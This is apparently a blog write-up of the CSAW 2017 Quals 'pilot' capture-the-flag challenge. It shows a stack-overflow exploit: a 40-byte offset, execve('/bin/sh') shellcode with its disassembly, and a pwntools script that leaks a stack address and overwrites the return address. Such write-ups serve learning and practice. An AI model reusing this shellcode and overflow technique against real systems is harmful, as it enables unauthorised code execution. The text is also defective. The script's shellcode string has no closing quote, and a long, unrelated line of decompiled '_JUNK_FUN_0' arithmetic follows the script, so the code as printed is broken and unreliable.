Posted Updated 2 minutes read (About 288 words)

PWN Learning: CSAW 2017 Quals - pilot

CSAW 2017 Quals - pilot Write up

A C++ PWN problem, the source code can be seen after decompiling by ida pro

image.png

A stack overflow vulnerability can be quickly discovered by decompiling the code

Debugging with gdb, pattern_create 100 after the input generated error messages

image.png

It can be calculated that the offset is 40 bytes, after inputting 40 bytes of data can overwrite the subsequent 8 bytes of return address

Use the following shellcode (execve([“/bin/sh”],[],[]))

1
2
3
4
5
6
7
8
9
10
11
12
13
14
 0:   31 f6                   xor    esi, esi
 2:   48                      dec    eax
 3:   bb 2f 62 69 6e          mov    ebx, 0x6e69622f
 8:   2f                      das    
 9:   2f                      das    
 a:   73 68                   jae    0x74
 c:   56                      push   esi
 d:   53                      push   ebx
 e:   54                      push   esp
 f:   5f                      pop    edi
10:   6a 3b                   push   0x3b
12:   58                      pop    eax
13:   31 d2                   xor    edx, edx
15:   0f 05                   syscall

Get flag

image.png

Here is the attack script:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
from pwn import *

shellcode = b"\x31\xf6\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x56\x53\x54\x5f\x6a\x3b\x58\x31\xd2\x0f\x05
# print(disasm(shellcode))

#io = process("./easy_pwn")
io = remote("xxx.xxx.xxx.xxx", xxxx)

io.recvuntil("Location:")
addr = int(io.recv()[0:14], 16)
# print(address)

io.sendline(shellcode+b'a'*(40-len(shellcode))+p64(addr))
io.interactive()

_JUNK_FUN_0((3 * dword_100910C0 * dword_100910C4 * dword_100910CC + 4096) | (dword_100910C4+ dword_100910D0+ 2 * (4096 - dword_100910C8)- dword_100910C0 * dword_100910CC+ 3 * dword_100910D4),(2 * (dword_100910D0 * (dword_100910D4 + dword_100910D0) + dword_100910C8 * (dword_100910C4 * dword_100910C8 * dword_100910C8 + 2) + 4 * (dword_100910C0 - dword_100910CC) + 4096 - dword_100910D4)) | (6 * (2 * dword_100910C4- dword_100910D4 * (dword_100910C8 * dword_100910CC + 1) - dword_100910CC) + dword_100910D0* (6* (dword_100910C0 * dword_100910C8 * dword_100910D0 - dword_100910C4 * dword_100910D4)- 6)+ 4096))

PWN Learning: CSAW 2017 Quals - pilot

http://aslin.site/2022/03/17/PWN-Learning-CSAW-2017-Quals-pilot/

Author

ACce1er4t0r

Posted on

2022-03-17

Updated on

2023-04-22

Licensed under

Recents

Archives

×